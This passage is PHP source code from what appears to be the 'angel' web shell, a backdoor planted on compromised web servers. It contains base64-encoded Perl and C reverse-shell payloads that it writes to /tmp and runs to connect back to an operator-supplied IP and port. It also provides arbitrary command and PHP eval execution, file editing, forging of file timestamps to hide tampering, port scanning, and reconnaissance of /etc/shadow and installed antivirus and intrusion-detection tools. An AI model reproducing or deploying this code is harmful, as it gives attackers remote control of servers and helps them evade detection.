782						p('<td align="center" width="2%"><input type="checkbox" name="bak_table[]" value="'.$table['Name'].'" /></td>');
783						p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
784						p('<td>'.$table['Rows'].'&nbsp;</td>');
785						p('<td>'.sizecount($table['Data_length']).'</td>');
786						p('<td>'.$table['Create_time'].'&nbsp;</td>');
787						p('<td>'.$table['Update_time'].'&nbsp;</td>');
788						if ($highver) {
789							p('<td>'.$table['Engine'].'</td>');
790							p('<td>'.$table['Collation'].'</td>');
791						}
792						p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a></td>');
793						p('</tr>');
794					}
795					p('<tr class="head">');
796					p('<td width="2%">&nbsp;</td>');
797					p('<td>'.$table_num.' table(s)</td>');
798					p('<td>'.$table_rows.'</td>');
799					p('<td>'.$data_size.'</td>');
800					p('<td>&nbsp;</td>');
801					p('<td>&nbsp;</td>');
802					if ($highver) {
803						p('<td>'.$db_engine['Value'].'</td>');
804						p('<td>'.$db_collation['Value'].'</td>');
805					}
806					p('<td>&nbsp;</td>');
807					p('</tr>');
808					p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"bak_path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"button\" value=\"Export selection table\" onclick=\"$('doing').value='dump';$('dbform').submit();\" /></td></tr>");
809					p("</table>");
810				} else {
811					p('<p class="red b">No tables</p>');
812				}
813				$DB->free_result($query);
814			}
815		}
816		$DB->close();
817	}
818	formfoot();
819}//end mysql
820
821elseif ($act == 'backconnect') {
822
823	!$p2 && $p2 = $_SERVER['REMOTE_ADDR'];
824	!$p3 && $p3 = '12345';
825	$usedb = array('perl'=>'perl','c'=>'c');
826
827	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
828		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
829		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
830		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
831		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
832		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
833		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
834	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
835		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
836		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
837		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
838		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
839		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
840		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
841		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
842
843	if ($p1 == 'start' && $p2 && $p3 && $p4){
844		if ($p4 == 'perl') {
845			cf('/tmp/angel_bc',$back_connect);
846			$res = execute(which('perl')." /tmp/angel_bc ".$p2." ".$p3." &");
847		} else {
848			cf('/tmp/angel_bc.c',$back_connect_c);
849			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
850			@unlink('/tmp/angel_bc.c');
851			$res = execute("/tmp/angel_bc ".$p2." ".$p3." &");
852		}
853		m('Now script try connect to '.$p2.':'.$p3.' ...');
854	}
855
856	formhead(array('title'=>'Back Connect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);return false;'));
857	p('<p>');
858	p('Your IP:');
859	makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
860	p('Your Port:');
861	makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));
862	p('Use:');
863	makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));
864	makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));
865	p('</p>');
866	formfoot();
867}//end
868
869elseif ($act == 'portscan') {
870	!$p2 && $p2 = '127.0.0.1';
871	!$p3 && $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
872	formhead(array('title'=>'Port Scan', 'onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);return false;'));
873	p('<p>');
874	p('IP:');
875	makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
876	p('Port:');
877	makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));
878	makeinput(array('value'=>'Scan','type'=>'submit','class'=>'bt'));
879	p('</p>');
880	formfoot();
881
882	if ($p1 == 'start') {
883		p('<h2>Result &raquo;</h2>');
884		p('<ul class="info">');
885		foreach(explode(',', $p3) as $port) {
886			$fp = @fsockopen($p2, $port, $errno, $errstr, 1); 
887			if (!$fp) {
888				p('<li>'.$p2.':'.$port.' ------------------------ <span class="b">Close</span></li>');
889		   } else {
890				p('<li>'.$p2.':'.$port.' ------------------------ <span class="red b">Open</span></li>');
891				@fclose($fp);
892		   } 
893		}
894		p('</ul>');
895	}
896}
897
898elseif ($act == 'eval') {
899	$phpcode = trim($p1);
900	if($phpcode){
901		if (!preg_match('#<\?#si', $phpcode)) {
902			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
903		}
904		eval("?".">$phpcode<?");
905	}
906	formhead(array('title'=>'Eval PHP Code', 'onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));
907	maketext(array('title'=>'PHP Code','name'=>'p1', 'value'=>$phpcode));
908	p('<p><a href="http://w'.'ww.g'.'oo'.'gle.com'.'sp'.'y/pl'.'ugin/" target="_blank">Get plugins</a></p>');
909	formfooter();
910}//end eval
911
912elseif ($act == 'editfile') {
913
914	
915	if ($p1 == 'edit' && $p2 && $p3) {
916		$fp = @fopen($p2,'w');
917		m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
918		@fclose($fp);
919	}
920	$contents = '';
921	if(file_exists($p2)) {
922		$fp=@fopen($p2,'r');
923		$contents=@fread($fp, filesize($p2));
924		@fclose($fp);
925		$contents=htmlspecialchars($contents);
926	}
927	formhead(array('title'=>'Create / Edit File', 'onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);return false;'));
928	makeinput(array('title'=>'Filename','name'=>'p2','value'=>$p2,'newline'=>1));
929	maketext(array('title'=>'File Content','name'=>'p3','value'=>$contents));
930	formfooter();
931	goback();
932
933}//end editfile
934
935elseif ($act == 'newtime') {
936	$filemtime = @filemtime($p1);
937
938	formhead(array('title'=>'Clone folder/file was last modified time', 'onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);return false;'));
939	makeinput(array('title'=>'Alter folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
940	makeinput(array('title'=>'Reference folder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));
941	formfooter();
942
943	formhead(array('title'=>'Set last modified', 'onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;'));
944	makeinput(array('title'=>'Current folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
945	makeinput(array('title'=>'Modify time','name'=>'p3','value'=>date("Y-m-d H:i:s", $filemtime),'size'=>120,'newline'=>1));
946	formfooter();
947
948	goback();
949}//end newtime
950
951elseif ($act == 'shell') {
952	formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));
953	p('<p>');
954	makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));
955	makeinput(array('class'=>'bt','type'=>'submit','value'=>'Execute'));
956	p('</p>');
957	formfoot();
958
959	if ($p1) {
960		p('<pre>'.execute($p1).'</pre>');
961	}
962}//end shell
963
964elseif ($act == 'phpenv') {
965	$d=array();
966	if(function_exists('mysql_get_client_info'))
967		$d[] = "MySql (".mysql_get_client_info().")";
968	if(function_exists('mssql_connect'))
969		$d[] = "MSSQL";
970	if(function_exists('pg_connect'))
971		$d[] = "PostgreSQL";
972	if(function_exists('oci_connect'))
973		$d[] = "Oracle";
974	$info = array(
975		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
976		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
977		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
978		4 => array('Server OS',PHP_OS),
979		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
980		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
981		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
982		8 => array('PHP run mode',strtoupper(php_sapi_name())),
983		9 => array('The file path',__FILE__),
984
985		10 => array('PHP Version',PHP_VERSION),
986		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
987		12 => array('Safe Mode',getcfg('safe_mode')),
988		13 => array('Administrator',(isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
989		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
990		15 => array('enable_dl',getcfg('enable_dl')),
991		16 => array('display_errors',getcfg('display_errors')),
992		17 => array('register_globals',getcfg('register_globals')),
993		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
994		19 => array('memory_limit',getcfg('memory_limit')),
995		20 => array('post_max_size',getcfg('post_max_size')),
996		21 => array('upload_max_filesize',(getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed')),
997		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
998		23 => array('disable_functions',($dis_func ? $dis_func : 'No')),
999		24 => array('Supported databases',implode(', ', $d)),
1000		25 => array('cURL support',function_exists('curl_version') ? 'Yes' : 'No'),
1001		26 => array('Open base dir',getcfg('open_basedir')),
1002		27 => array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
1003		28 => array('Safe mode include dir',getcfg('safe_mode_include_dir')),
1004	);
1005
1006	$hp = array(0=> 'Server', 1=> 'PHP');
1007	for($a=0;$a<2;$a++) {
1008		p('<h2>'.$hp[$a].' &raquo;</h2>');
1009		p('<ul class="info">');
1010		if ($a==0) {
1011			for($i=1;$i<=9;$i++) {
1012				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1013			}
1014		} elseif ($a == 1) {
1015			for($i=10;$i<=25;$i++) {
1016				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1017			}
1018		}
1019		p('</ul>');
1020	}
1021}//end phpenv
1022
1023elseif ($act == 'secinfo') {
1024	
1025	if( !IS_WIN ) {
1026		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1027		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1028		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1029		secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
1030		secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
1031		secparam('OS version', @file_get_contents('/proc/version'));
1032		secparam('Distr name', @file_get_contents('/etc/issue.net'));
1033		$safe_mode = @ini_get('safe_mode');
1034		if(!$GLOBALS['safe_mode']) {
1035			$temp=array();
1036			foreach ($userful as $item)
1037				if(which($item)){$temp[]=$item;}
1038			secparam('Userful', implode(', ',$temp));
1039			$temp=array();
1040			foreach ($danger as $item)
1041				if(which($item)){$temp[]=$item;}
1042			secparam('Danger', implode(', ',$temp));
1043			$temp=array();
1044			foreach ($downloaders as $item) 
1045				if(which($item)){$temp[]=$item;}
1046			secparam('Downloaders', implode(', ',$temp));
1047			secparam('Hosts', @file_get_contents('/etc/hosts'));
1048			secparam('HDD space', execute('df -h'));
1049			secparam('Mount options', @file_get_contents('/etc/fstab'));
1050		}
1051	} else {
1052		secparam('OS Version',execute('ver'));
1053		secparam('Account Settings',execute('net accounts'));
1054		secparam('User Accounts',execute('net user'));
1055		secparam('IP Configurate',execute('ipconfig -all'));
1056	}
1057}//end
1058
1059else {
1060	m('Undefined Action');
1061}
1062
1063?>
1064</td></tr></table>
1065
1066</body>
1067</html>
1068
1069<?php
1070
1071function secparam($n, $v) {
1072	$v = trim($v);
1073	if($v) {
1074		p('<h2>'.$n.' &raquo;</h2>');
1075		p('<div class="infolist">');
1076		if(strpos($v, "\n") === false)
1077			p($v.'<br />');
1078		else
1079			p('<pre>'.$v.'</pre>');
1080		p('</div>');
1081	}
1082}
1083function m($msg) {
1084	echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
1085	echo $msg;
1086	echo '</div>';
1087}
1088function s_array($array) {
1089	return is_array($array) ? array_map('s_array', $array) : stripslashes($array);
1090}
1091function scookie($key, $value, $life = 0, $prefix = 1) {
1092	global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
1093	$key = ($prefix ? $cookiepre : '').$key;
1094	$life = $life ? $life : $cookielife;
1095	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1096	setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
1097}
1098function loginpage() {
1099	formhead();
1100	makehide('act','login');
1101	makeinput(array('name'=>'password','type'=>'password','size'=>'20'));
1102	makeinput(array('type'=>'submit','value'=>'Login'));
1103	formfoot();
1104	exit;
1105}
1106function execute($cfe) {
1107	$res = '';
1108	if ($cfe) {
1109		if(function_exists('system')) {
1110			@ob_start();
1111			@system($cfe);
1112			$res = @ob_get_contents();
1113			@ob_end_clean();
1114		} elseif(function_exists('passthru')) {
1115			@ob_start();
1116			@passthru($cfe);
1117			$res = @ob_get_contents();
1118			@ob_end_clean();
1119		} elseif(function_exists('shell_exec')) {
1120			$res = @shell_exec($cfe);
1121		} elseif(function_exists('exec')) {
1122			@exec($cfe,$res);
1123			$res = join("\n",$res);
1124		} elseif(@is_resource($f = @popen($cfe,"r"))) {
1125			$res = '';
1126			while(!@feof($f)) {
1127				$res .= @fread($f,1024); 
1128			}
1129			@pclose($f);
1130		}
1131	}
1132	return $res;
1133}
1134function which($pr) {
1135	$path = execute("which $pr");
1136	return ($path ? $path : $pr); 
1137}
1138function cf($fname,$text){
1139	if($fp=@fopen($fname,'w')) {
1140		@fputs($fp,@base64_decode($text));
1141		@fclose($fp);
1142	}
1143}
1144function dirsize($cwd) { 
1145	$dh = @opendir($cwd);
1146	$size = 0;
1147	while($file = @readdir($dh)) {
1148		if ($file != '.' && $file != '..') {
1149			$path = $cwd.'/'.$file;
1150			$size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path));
1151		}
1152	}
1153	@closedir($dh);
1154	return $size;
1155}
1156
1157function debuginfo() {
1158	global $starttime;
1159	$mtime = explode(' ', microtime());
1160	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1161	echo 'Processed in '.$totaltime.' second(s)';
1162}
1163
1164
1165function html_clean($content) {
1166	$content = htmlspecialchars($content);
1167	$content = str_replace("\n", "<br />", $content);
1168	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
1169	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1170	return $content;
1171}
1172
1173
1174function getChmod($file){
1175	return substr(base_convert(@fileperms($file),10,8),-4);
1176}
1177
1178function PermsColor($f) { 
1179	if (!is_readable($f)) {
1180		return '<span class="red">'.getPerms($f).'</span>';
1181	} elseif (!is_writable($f)) {
1182		return '<span class="black">'.getPerms($f).'</span>';
1183	} else {
1184		return '<span class="green">'.getPerms($f).'</span>';
1185	}
1186}
1187function getPerms($file) {
1188	$mode = @fileperms($file);
1189	if (($mode & 0xC000) === 0xC000) {$type = 's';}
1190	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1191	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1192	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
1193	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1194	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1195	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1196	else {$type = '?';}
1197
1198	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
1199	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
1200	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
1201	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
1202	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
1203	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
1204	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
1205	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
1206	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
1207
1208	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1209	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1210	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1211 
1212	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1213}
1214
1215function getUser($file)	{
1216	if (function_exists('posix_getpwuid')) {
1217		$array = @posix_getpwuid(@fileowner($file));
1218		if ($array && is_array($array)) {
1219			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1220		}
1221	}
1222	return '';
1223}
1224
1225function copy_paste($c,$f,$d){
1226	if(is_dir($c.$f)){
1227		mkdir($d.$f);
1228		$dirs = scandir($c.$f);
1229		if ($dirs) {
1230			$dirs = array_diff($dirs, array('..', '.'));
1231			foreach ($dirs as $file) {
1232				copy_paste($c.$f.'/',$file, $d.$f.'/');
1233			}
1234		}
1235	} elseif(is_file($c.$f)) {
1236		copy($c.$f, $d.$f);
1237	}
1238}
1239
1240function deltree($deldir) {
1241	$dirs = @scandir($deldir);
1242	if ($dirs) {
1243		$dirs = array_diff($dirs, array('..', '.'));
1244		foreach ($dirs as $file) {	
1245			if((is_dir($deldir.'/'.$file))) {
1246				@chmod($deldir.'/'.$file,0777);
1247				deltree($deldir.'/'.$file); 
1248			} else {
1249				@chmod($deldir.'/'.$file,0777);
1250				@unlink($deldir.'/'.$file);
1251			}
1252		}
1253		@chmod($deldir,0777);
1254		return @rmdir($deldir) ? 1 : 0;
1255	} else {
1256		return 0;
1257	}
1258}
1259
1260
1261function bg() {
1262	global $bgc;
1263	return ($bgc++%2==0) ? 'alt1' : 'alt2';
1264}
1265
1266function cmp($a, $b) {
1267	global $sort;
1268	if(is_numeric($a[$sort[0]])) {
1269		return (($a[$sort[0]] < $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1);
1270	} else {
1271		return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1);
1272	}
1273}
1274
1275
1276function getUpPath($cwd) {
1277	$pathdb = explode('/', $cwd);
1278	$num = count($pathdb);
1279	if ($num > 2) {
1280		unset($pathdb[$num-1],$pathdb[$num-2]);
1281	}
1282	$uppath = implode('/', $pathdb).'/';
1283	$uppath = str_replace('//', '/', $uppath);
1284	return $uppath;
1285}
1286
1287
1288function getcfg($varname) {
1289	$result = get_cfg_var($varname);
1290	if ($result == 0) {
1291		return 'No';
1292	} elseif ($result == 1) {
1293		return 'Yes';
1294	} else {
1295		return $result;
1296	}
1297}
1298
1299
1300function getext($file) {
1301	$info = pathinfo($file);
1302	return $info['extension'];
1303}
1304function GetWDirList($path){
1305	global $dirdata,$j,$web_cwd;
1306	!$j && $j=1;
1307	$dirs = @scandir($path);
1308	if ($dirs) {
1309		$dirs = array_diff($dirs, array('..','.'));
1310		foreach ($dirs as $file) {
1311			$f=str_replace('//','/',$path.'/'.$file);
1312			if(is_dir($f)){
1313				if (is_writable($f)) {
1314					$dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f);
1315					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1316					$dirdata[$j]['chmod']=getChmod($f);
1317					$dirdata[$j]['perm']=PermsColor($f);
1318					$dirdata[$j]['owner']=getUser($f);
1319					$dirdata[$j]['link']=$f;
1320					$j++;
1321				}
1322				GetWDirList($f);
1323			}
1324		}
1325		return $dirdata;
1326	} else {
1327		return array();
1328	}
1329}
1330function sizecount($size) {
1331	$unit = array('Bytes', 'KB', 'MB', 'GB', 'TB','PB');
1332	for ($i = 0; $size >= 1024 && $i < 5; $i++) {
1333		$size /= 1024;
1334	}
1335	return round($size, 2).' '.$unit[$i];
1336}
1337function p($str){
1338	echo $str."\n";
1339}
1340
1341function makehide($name,$value=''){
1342	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
1343}
1344
1345function makeinput($arg = array()){
1346	$arg['size'] = isset($arg['size']) && $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
1347	$arg['type'] = isset($arg['type']) ? $arg['type'] : 'text';
1348	$arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
1349	$arg['class'] = isset($arg['class']) ? $arg['class'] : 'input';
1350	$arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1351	$arg['value'] = isset($arg['value']) ? $arg['value'] : '';
1352	if (isset($arg['newline'])) p('<p>');
1353	p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] />");
1354	if (isset($arg['newline'])) p('</p>');
1355}
1356
1357function makeselect($arg = array()){
1358	$onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : '';
1359	$arg['title'] = isset($arg['title']) ? $arg['title'] : '';
1360	$arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1361	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
1362		if (is_array($arg['option'])) {
1363			foreach ($arg['option'] as $key=>$value) {
1364				if ($arg['selected']==$key) {
1365					p("<option value=\"$key\" selected>$value</option>");
1366				} else {
1367					p("<option value=\"$key\">$value</option>");
1368				}
1369			}
1370		}
1371	p("</select>");
1372}
1373function formhead($arg = array()) {
1374	!isset($arg['method']) && $arg['method'] = 'post';
1375	!isset($arg['name']) && $arg['name'] = 'form1';
1376	$arg['extra'] = isset($arg['extra']) ? $arg['extra'] : '';
1377	$arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : '';
1378	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"".SELF."\" method=\"$arg[method]\" $arg[onsubmit] $arg[extra]>");
1379	if (isset($arg['title'])) {
1380		p('<h2>'.$arg['title'].' &raquo;</h2>');
1381	}
1382}
1383	
1384function maketext($arg = array()){
1385	$arg['title'] = isset($arg['title']) ? $arg['title'].'<br />' : '';
1386	$arg['name'] = isset($arg['name']) ? $arg['name'] : '';
1387	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"100\" rows=\"25\">$arg[value]</textarea></p>");
1388}
1389
1390function formfooter($name = ''){
1391	!$name && $name = 'submit';
1392	p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
1393	p('</form>');
1394}
1395
1396function goback(){
1397	global $cwd, $charset;
1398	p('<form action="'.SELF.'" method="post"><input type="hidden" name="act" value="file" /><input type="hidden" name="cwd" value="'.$cwd.'" /><input type="hidden" name="charset" value="'.$charset.'" /><p><input class="bt" type="submit" value="Go back..."></p></form>');
1399}
1400
1401function formfoot(){
1402	p('</form>');
1403}
1404
1405function encode_pass($pass) {
1406	$k = 'angel';
1407	$pass = md5($k.$pass);
1408	$pass = md5($pass.$k);
1409	$pass = md5($k.$pass.$k);
1410	return $pass;
1411}
1412
1413function pr($a) {
1414	p('<div style="text-align: left;border:1px solid #ddd;"><pre>'.print_r($a).'</pre></div>');
1415}
1416
1417class DB_MySQL  {
1418
1419	var $querycount = 0;
1420	var $link;
1421	var $charsetdb = array();
1422	var $charset = '';
1423
1424	function connect($dbhost, $dbuser, $dbpass, $dbname='') {
1425		@ini_set('mysql.connect_timeout', 5);
1426		if(!$this->link = @mysql_connect($dbhost, $dbuser, $dbpass, 1)) {
1427			$this->halt('Can not connect to MySQL server');
1428		}
1429		if($this->version() > '4.1') {
1430			$this->setcharset($this->charset);
1431		}
1432		$dbname && mysql_select_db($dbname, $this->link);
1433	}
1434	function setcharset($charset) {
1435		if ($charset && $this->charsetdb[$charset]) {
1436			if(function_exists('mysql_set_charset')) {
1437				mysql_set_charset($this->charsetdb[$charset], $this->link);
1438			} else {
1439				$this->query("SET character_set_connection='".$this->charsetdb[$charset]."', character_set_results='".$this->charsetdb[$charset]."', character_set_client=binary");
1440			}
1441		}
1442	}
1443	function select_db($dbname) {
1444		return mysql_select_db($dbname, $this->link);
1445	}
1446	function geterrdesc() {
1447		return (($this->link) ? mysql_error($this->link) : mysql_error());
1448	}
1449	function geterrno() {
1450		return intval(($this->link) ? mysql_errno($this->link) : mysql_errno());
1451	}
1452	function fetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM
1453		return mysql_fetch_array($query, $result_type);
1454	}
1455	function query($sql) {
1456		//echo '<p style="color:#f00;">'.$sql.'</p>';
1457		if(!($query = mysql_query($sql, $this->link))) {
1458			$this->halt('MySQL Query Error', $sql);
1459		}
1460		$this->querycount++;
1461		return $query;
1462	}
1463	function query_res($sql) { 
1464		$res = '';
1465		if(!$res = mysql_query($sql, $this->link)) { 
1466			$res = 0;
1467		} else if(is_resource($res)) {
1468			$res = 1; 
1469		} else {
1470			$res = 2;
1471		}
1472		$this->querycount++;
1473		return $res;
1474	}
1475	function num_rows($query) {
1476		$query = mysql_num_rows($query);
1477		return $query;
1478	}
1479	function num_fields($query) {
1480		$query = mysql_num_fields($query);
1481		return $query;
1482	}
1483	function affected_rows() {
1484		return mysql_affected_rows($this->link);
1485	}
1486	function result($query, $row) {
1487		$query = mysql_result($query, $row);
1488		return $query;
1489	}	
1490	function free_result($query) {
1491		$query = mysql_free_result($query);
1492		return $query;
1493	}
1494	function version() {
1495		return mysql_get_server_info($this->link);
1496	}
1497	function close() {
1498		return mysql_close($this->link);
1499	}
1500	function halt($msg =''){
1501		echo "<h2>".htmlspecialchars($msg)."</h2>\n";
1502		echo "<p class=\"b\">Mysql error description: ".htmlspecialchars($this->geterrdesc())."</p>\n";
1503		echo "<p class=\"b\">Mysql error number: ".$this->geterrno()."</p>\n";
1504		exit;
1505	}
1506	function get_fields_meta($result) {
1507		$fields = array();
1508		$num_fields = $this->num_fields($result);
1509		for ($i = 0; $i < $num_fields; $i++) {
1510			$field = mysql_fetch_field($result, $i);
1511			$fields[] = $field;
1512		}
1513		return $fields;
1514	}
1515	function sqlAddSlashes($s = ''){
1516		$s = str_replace('\\', '\\\\', $s);
1517		$s = str_replace('\'', '\'\'', $s);
1518		return $s;
1519	}
1520	
1521	function sqldump($table, $fp=0) {
1522		$crlf = (IS_WIN ? "\r\n" : "\n");
